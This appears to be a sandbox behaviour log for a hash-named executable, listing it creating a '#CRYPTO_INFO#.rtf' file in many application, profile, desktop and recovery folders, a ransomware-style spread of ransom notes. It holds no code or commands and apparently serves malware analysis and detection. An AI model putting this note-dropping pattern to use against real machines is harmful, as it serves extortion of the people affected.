8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\w0w630d3.default-release\startupCache\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Recovery\WindowsRE\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\vi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\az-Latn-AZ\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\uninstall\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-sl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\Desktop\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Update\Install\{1DD96F7A-AD33-4336-A298-2296283FF9BE}\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\Searches\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ja-jp\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\amd64\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ku-Arab\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\w0w630d3.default-release\datareporting\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Platform Notifications\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\Settings\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\security\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#CRYPTO_INFO#.rtf 